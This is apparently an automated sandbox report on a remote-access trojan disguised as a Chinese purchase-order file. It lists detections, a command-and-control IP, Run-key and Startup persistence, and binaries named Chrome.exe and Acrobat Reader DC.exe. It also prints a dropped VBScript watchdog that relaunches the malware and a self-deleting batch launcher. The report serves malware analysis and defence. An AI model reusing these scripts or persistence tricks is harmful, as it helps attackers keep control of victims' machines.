                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_004720DB _memset,_memset,GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,10_2_004720DB
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,10_2_0041E364
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,10_2_0040E500

                        Lowering of HIPS / PFW / Operating System Security Settings

                        Source: Yara matchFile source: 1.2.NRHRAS.exe.2cda580.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.NRHRAS.exe.2f0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.NRHRAS.exe.2cda580.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.321313528.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.238959755.00000000002F2000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: NRHRAS.exe PID: 5576, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Stub\Chrome.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe, type: DROPPED
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
                        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                        Behavior Graph ID: 719236 Sample: #U91c7#U8d2d#U8ba2#U5355#U8... Startdate: 10/10/2022 Architecture: WINDOWS Score: 100

                        Source | Detection | Scanner | Label | Link
                        #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe | 100% | Avira | HEUR/AGEN.1229397 |

                        Source | Detection | Scanner | Label | Link
                        C:\Users\user\AppData\Roaming\Stub\Chrome.exe | 100% | Avira | HEUR/AGEN.1203089 |
                        C:\Users\user\AppData\Local\Temp\UALDJT.vbs | 100% | Avira | VBS/Runner.VPJI |
                        C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe | 100% | Avira | HEUR/AGEN.1229397 |
                        C:\Users\user\AppData\Local\Temp\NRHRAS.exe | 100% | Avira | HEUR/AGEN.1203089 |
                        C:\Users\user\AppData\Roaming\Stub\Chrome.exe | 100% | Joe Sandbox ML | |
                        C:\Users\user\AppData\Local\Temp\NRHRAS.exe | 100% | Joe Sandbox ML | |
                        C:\Users\user\AppData\Local\Temp\NRHRAS.exe | 85% | ReversingLabs | ByteCode-MSIL.Trojan.Dnoper |
                        C:\Users\user\AppData\Local\Temp\NRHRAS.exe | 79% | Virustotal | | Browse
                        C:\Users\user\AppData\Local\Temp\NRHRAS.exe | 43% | Metadefender | | Browse
                        C:\Users\user\AppData\Roaming\Stub\Chrome.exe | 85% | ReversingLabs | ByteCode-MSIL.Trojan.Dnoper |
                        C:\Users\user\AppData\Roaming\Stub\Chrome.exe | 79% | Virustotal | | Browse
                        C:\Users\user\AppData\Roaming\Stub\Chrome.exe | 43% | Metadefender | | Browse
                        C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe | 73% | ReversingLabs | Win32.Backdoor.Bladabhindi |

                        Source | Detection | Scanner | Label | Link | Download
                        0.3.#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe.414d840.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
                        0.3.#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe.4110c48.1.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
                        0.3.#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe.40e8450.0.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
                        No Antivirus matches
                        No Antivirus matches
                        No contacted domains info
                        Name | Source | Malicious | Antivirus Detection | Reputation
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | NRHRAS.exe, 00000001.00000002.300171430.00000000026B1000.00000004.00000800.00020000.00000000.sdmp | false | | high
                          IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                          194.5.98.212 | unknown | Netherlands | | 208476 | DANILENKODE | true
                          IP
                          192.168.2.1
                          127.0.0.1
                          Joe Sandbox Version:36.0.0 Rainbow Opal
                          Analysis ID:719236
                          Start date and time:2022-10-10 07:42:33 +02:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 11m 25s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Run name:Run with higher sleep bypass
                          Number of analysed new started processes analysed:32
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@30/12@0/3
                          EGA Information:
                          • Successful, ratio: 100%
                          HDC Information:
                          • Successful, ratio: 52% (good quality ratio 49.8%)
                          • Quality average: 83.5%
                          • Quality standard deviation: 25.2%
                          HCA Information:
                          • Successful, ratio: 90%
                          • Number of executed functions: 76
                          • Number of non-executed functions: 325
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Report size getting too big, too many NtSetInformationFile calls found.
                          Time | Type | Description
                          07:43:31 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run UALDJT "C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe"
                          07:43:40 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run UALDJT "C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe"
                          07:43:50 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UALDJT.lnk
                          Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                          194.5.98.212 | 975nbIb5Ho.exe | Get hash | malicious | Browse | 194.5.98.212:4001/moz-sdk
                          No context
                          No context
                          Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                          C:\Users\user\AppData\Roaming\Stub\Chrome.exe | #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe | Get hash | malicious | Browse |
                          C:\Users\user\AppData\Local\Temp\NRHRAS.exe | #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe | Get hash | malicious | Browse |
                          C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe | #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe | Get hash | malicious | Browse |
                                Process:C:\Users\user\AppData\Local\Temp\NRHRAS.exe
                                File Type:CSV text
                                Category:dropped
                                Size (bytes):654
                                Entropy (8bit):5.374391981354885
                                Encrypted:false
                                SSDEEP:12:Q3La/KDLI4MWuPTxAIOKbbDLI4MWuPOKN08JOKhap+92n4MNQpN9tv:ML9E4KrgKDE4KGKN08AKh6+84xpNT
                                MD5:C8A62E39DE7A3F805D39384E8BABB1E0
                                SHA1:B32B1257401F17A2D1D5D3CC1D8C1E072E3FEE31
                                SHA-256:A7BC127854C5327ABD50C86000BF10586B556A5E085BB23523B07A15DD4C5383
                                SHA-512:7DB2825131F5CDA6AF33A179D9F7CD0A206FF34AE50D6E66DE9E99BE2CD1CB985B88C00F0EDE72BBC4467E7E42B5DC6132403AA2EC1A0A7A6D11766C438B10C3
                                Malicious:false
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\f2e0589ed6d670f264a5f65dd0ad000f\Microsoft.VisualBasic.ni.dll",0..
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):0.9260988789684415
                                Encrypted:false
                                SSDEEP:3:Nlllulb/lj:NllUb/l
                                MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                Malicious:false
                                Preview:@...e................................................@..........
                                Process:C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):51200
                                Entropy (8bit):5.624273190284013
                                Encrypted:false
                                SSDEEP:768:LcUAfpLYlYz/kv+Zrs47rbbaM8pevmJANvoizcc6Jg2vYjDGcfAgpv65D0Q:oUAfr/kmFfbaMruAEDnvY1fAAv6WQ
                                MD5:9B1C1C565D60ED67CB6E1986ACD95C3A
                                SHA1:29FCFCF6643FB10468D28B2DFE3743728C3D3F1C
                                SHA-256:AC7C5B85153457541EA7E9EAE7767DB27C7604B3A61E15046E5C5736C1F7479C
                                SHA-512:B2D69E82539C877CB79441E132B9AD8E1424C5C2501017439834EA4BD5E7EF871ECFE43BF69B69E91C5B93B5C0773E25A016C2FE709ABB083B14248D49F42CDF
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_S500Rat, Description: Yara detected S500Rat, Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe, Author: Joe Security
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 85%
                                • Antivirus: Virustotal, Detection: 79%, Browse
                                • Antivirus: Metadefender, Detection: 43%, Browse
                                Joe Sandbox View:
                                • Filename: #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe, Detection: malicious, Browse
                                Process:C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:modified
                                Size (bytes):939
                                Entropy (8bit):5.555511759188888
                                Encrypted:false
                                SSDEEP:24:dF/UmXTRkT4U/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/U+T6Txt+G+7xLxe0WABNVIqZaVzgA
                                MD5:41EA145577CF485D8DDA2F334D71B854
                                SHA1:E5C1A867435E510ACB7C317300C23F6A59423016
                                SHA-256:42A274DEC7ECD2F0D2CEC8CBFF8CF24D2C995A24278F5042BE3A9BA900EFF36C
                                SHA-512:B7C8DF912A84F7AE93EA68F93E95F7ECE177A2E538F0E1E376F2C7E5BD00F4AD0CA5615E189FEAC4C4D37D7579C0F9A99B096EA405F2FB58149439E292172282
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\UALDJT.vbs, Author: Joe Security
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe"..fileset = """C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Preview:1
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Preview:1
                                Process:C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):29860
                                Entropy (8bit):7.371356646020825
                                Encrypted:false
                                SSDEEP:768:h7phOX3Fa3yodW5FuSDZsd2SASP470En5rX:5p4HiBcLZDZsdZtQL
                                MD5:00C2047099F1325C03B2949E9095EA14
                                SHA1:EA6B3809FD55AC5174A445DF75CFDC750D8C4461
                                SHA-256:5CFED55D7384F02858516285BF2561A1203A8560E73FF536BCC3F998FF34B7A4
                                SHA-512:C916F397012B24F5596E4D31B4C55FB70ED1EAB47C80F1CD8ECF2BF495CA64FE6FFBBF4BB288BFF814E77B5C700E7B73621B791F58720E506E525EDBA2D5DBC0
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\NRHRAS.exe
                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):163
                                Entropy (8bit):5.060462211334656
                                Encrypted:false
                                SSDEEP:3:mKDDCMNqTtvL5o0nacwREaKC5QOHovmqRD0nacwRE2J5xAInTRI+QZPy:hWKqTtT6cNwiaZ5Qoovmq1cNwi23fTfT
                                MD5:1A02F8567AAD6EC592FC756BA574DEC3
                                SHA1:F09CAD97EDE501E87DCD5B7944CEF248706ED3D4
                                SHA-256:4295AF15D92E3270133D3CB4B18E0436B5E5F1A7457AFC75A86F39594D4AE73B
                                SHA-512:BDD2905A263AF003B431C89E5203F8700B114C8E6F859CD96A66E2ACAF895CF8F6AA6C25C388F0E29F0387C7DDDD057EE8FC1FAE1159631B2A61A98F71922AE2
                                Malicious:false
                                Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\Stub\Chrome.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmp1D8D.tmp.bat" /f /q..
                                Process:C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Oct 10 13:43:29 2022, mtime=Mon Oct 10 13:43:30 2022, atime=Mon Oct 10 13:43:30 2022, length=1382294, window=hide
                                Category:dropped
                                Size (bytes):1874
                                Entropy (8bit):3.50046165968657
                                Encrypted:false
                                SSDEEP:24:8Mpk2GL1b6y2mbesen/QCzDzyyAaVnDzkoE2+s9T4IlEDm:8Ma2Kb6yHDKZeahICr9MIlED
                                MD5:8F684E4EF58FCA16A20A720F701E0355
                                SHA1:FD909C87950AEC94F8DE9297E0250E811DD0CB1B
                                SHA-256:24D57F58580362B1224AAB68D03FF2C52BFF74D28CB2BD150DCE5B50A6DEE892
                                SHA-512:C7F8DA541C975C9540DEE8BFF5505C1120E1CDE64FEACF421DBC8FD236E66CE0F9B1C52248AEB8F01B674995270BAB7D017930ACD4AB8B54A3BFC01634ADF15F
                                Malicious:false
                                Preview:L..................F.@.. ..........._......._.................................:..DG..Yr?.D..U..k0.&...&......7...#-..................t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N..JUiu.....Y.....................P/.A.p.p.D.a.t.a...B.V.1.....JUnu..Roaming.@.......N..JUnu.....Y.....................&>.R.o.a.m.i.n.g.....V.1.....JUnu..Windata.@......JUnuJUnu.....q....#................&>.W.i.n.d.a.t.a.....x.2.....JUpu .ACROBA~1.EXE..\......JUouJUpu.....W........................A.c.r.o.b.a.t. .R.e.a.d.e.r. .D.C...e.x.e.......o...............-.......n............,3I.....C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe..,.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.A.c.r.o.b.a.t. .R.e.a.d.e.r. .D.C...e.x.e.-.".C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll..........................................
                                Process:C:\Users\user\AppData\Local\Temp\NRHRAS.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):51200
                                Entropy (8bit):5.624273190284013
                                Encrypted:false
                                SSDEEP:768:LcUAfpLYlYz/kv+Zrs47rbbaM8pevmJANvoizcc6Jg2vYjDGcfAgpv65D0Q:oUAfr/kmFfbaMruAEDnvY1fAAv6WQ
                                MD5:9B1C1C565D60ED67CB6E1986ACD95C3A
                                SHA1:29FCFCF6643FB10468D28B2DFE3743728C3D3F1C
                                SHA-256:AC7C5B85153457541EA7E9EAE7767DB27C7604B3A61E15046E5C5736C1F7479C
                                SHA-512:B2D69E82539C877CB79441E132B9AD8E1424C5C2501017439834EA4BD5E7EF871ECFE43BF69B69E91C5B93B5C0773E25A016C2FE709ABB083B14248D49F42CDF
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_S500Rat, Description: Yara detected S500Rat, Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exe, Author: Joe Security
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 85%
                                • Antivirus: Virustotal, Detection: 79%, Browse
                                • Antivirus: Metadefender, Detection: 43%, Browse
                                Joe Sandbox View:
                                • Filename: #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe, Detection: malicious, Browse
                                Process:C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):1382294
                                Entropy (8bit):7.25585974847377
                                Encrypted:false
                                SSDEEP:24576:kRmJkcoQricOIQxiZY1iau0Ar0WX1qr1wIWMXzFzkdS79w7BGO7:hJZoQrbTFZY1iaM7EC0zh1q0O7
                                MD5:D32389E2207879F0B57835EABCE6FB02
                                SHA1:23C2A0F0AC030766AE74B7FBFC242F3D77B0FF71
                                SHA-256:B3F2810E4BA5C3341498D99807E2F200459EB2BD4D365B3EE52A20E9E12606C1
                                SHA-512:8C9B9A881A941890DED45C19D9CEBD2BCC565347C31630E2ADC028CA9FE88555700E17E6F3DFDCB46CEC4F976E6DC6905341BAD9E1251FBA6F0774767DC969AD
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 73%
                                Joe Sandbox View:
                                • Filename: #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe, Detection: malicious, Browse
                                Process:C:\Windows\System32\timeout.exe
                                File Type:ASCII text, with CRLF line terminators, with overstriking
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.41440934524794
                                Encrypted:false
                                SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                MD5:3DD7DD37C304E70A7316FE43B69F421F
                                SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                Malicious:false
                                Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.25585974847377
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe
                                File size:1382294
                                MD5:d32389e2207879f0b57835eabce6fb02
                                SHA1:23c2a0f0ac030766ae74b7fbfc242f3d77b0ff71
                                SHA256:b3f2810e4ba5c3341498d99807e2f200459eb2bd4d365b3ee52a20e9e12606c1
                                SHA512:8c9b9a881a941890ded45c19d9cebd2bcc565347c31630e2adc028ca9fe88555700e17e6f3dfdcb46cec4f976e6dc6905341bad9e1251fba6f0774767dc969ad
                                SSDEEP:24576:kRmJkcoQricOIQxiZY1iau0Ar0WX1qr1wIWMXzFzkdS79w7BGO7:hJZoQrbTFZY1iaM7EC0zh1q0O7
                                TLSH:EE55B011B9818426C2F322B19F79F7B275295D36332691B727F83E277AB0C436B15722
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                Icon Hash:b2b292b2e298ac92
                                Entrypoint:0x4165c1
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:0
                                File Version Major:5
                                File Version Minor:0
                                Subsystem Version Major:5
                                Subsystem Version Minor:0
                                Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                Instruction
                                call 00007F7FBCB83C2Bh
                                jmp 00007F7FBCB7AA9Eh
                                int3
                                int3
                                int3
                                int3
                                int3
                                push ebp
                                mov ebp, esp
                                push edi
                                push esi
                                mov esi, dword ptr [ebp+0Ch]
                                mov ecx, dword ptr [ebp+10h]
                                mov edi, dword ptr [ebp+08h]
                                mov eax, ecx
                                mov edx, ecx
                                add eax, esi
                                cmp edi, esi
                                jbe 00007F7FBCB7AC1Ah
                                cmp edi, eax
                                jc 00007F7FBCB7ADB6h
                                cmp ecx, 00000080h
                                jc 00007F7FBCB7AC2Eh
                                cmp dword ptr [004A9724h], 00000000h
                                je 00007F7FBCB7AC25h
                                push edi
                                push esi
                                and edi, 0Fh
                                and esi, 0Fh
                                cmp edi, esi
                                pop esi
                                pop edi
                                jne 00007F7FBCB7AC17h
                                jmp 00007F7FBCB7AFF2h
                                test edi, 00000003h
                                jne 00007F7FBCB7AC26h
                                shr ecx, 02h
                                and edx, 03h
                                cmp ecx, 08h
                                jc 00007F7FBCB7AC3Bh
                                rep movsd
                                jmp dword ptr [00416740h+edx*4]
                                mov eax, edi
                                mov edx, 00000003h
                                sub ecx, 04h
                                jc 00007F7FBCB7AC1Eh
                                and eax, 03h
                                add ecx, eax
                                jmp dword ptr [00416654h+eax*4]
                                jmp dword ptr [00416750h+ecx*4]
                                nop
                                jmp dword ptr [004166D4h+ecx*4]
                                nop
                                inc cx
                                add byte ptr [eax-4BFFBE9Ah], dl
                                inc cx
                                add byte ptr [ebx], ah
                                ror dword ptr [edx-75F877FAh], 1
                                inc esi
                                add dword ptr [eax+468A0147h], ecx
                                add al, cl
                                jmp 00007F7FBEFF3417h
                                add esi, 03h
                                add edi, 03h
                                cmp ecx, 08h
                                jc 00007F7FBCB7ABDEh
                                rep movsd
                                jmp dword ptr [00000000h+edx*4]
                                Programming Language:
                                • [ C ] VS2010 SP1 build 40219
                                • [C++] VS2010 SP1 build 40219
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [ASM] VS2010 SP1 build 40219
                                • [RES] VS2010 SP1 build 40219
                                • [LNK] VS2010 SP1 build 40219

                                | Name | Virtual Address | Virtual Size | Is in Section |
                                |---|---|---|---|
                                | IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
                                | IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata |
                                | IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x34770 | .rsrc |
                                | IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
                                | IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
                                | IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
